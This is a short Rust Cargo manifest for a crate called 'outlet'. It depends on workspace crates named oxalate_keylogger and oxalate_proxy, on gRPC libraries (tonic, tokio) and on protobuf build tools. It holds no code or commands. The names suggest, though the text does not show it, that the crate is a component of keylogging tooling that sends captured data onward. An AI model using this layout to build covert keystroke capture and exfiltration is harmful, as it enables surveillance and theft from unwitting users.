[package]
name = "outlet"
version = "0.1.0"
edition = "2024"

[dependencies]
oxalate_keylogger = { workspace = true }
tonic = { workspace = true }
tokio = { workspace = true }
oxalate_proxy = { workspace = true }

 
[build-dependencies]
tonic-types = { workspace = true }
prost-types = { workspace = true }
glob = "0.3.2"
tonic-prost-build = "0.14"
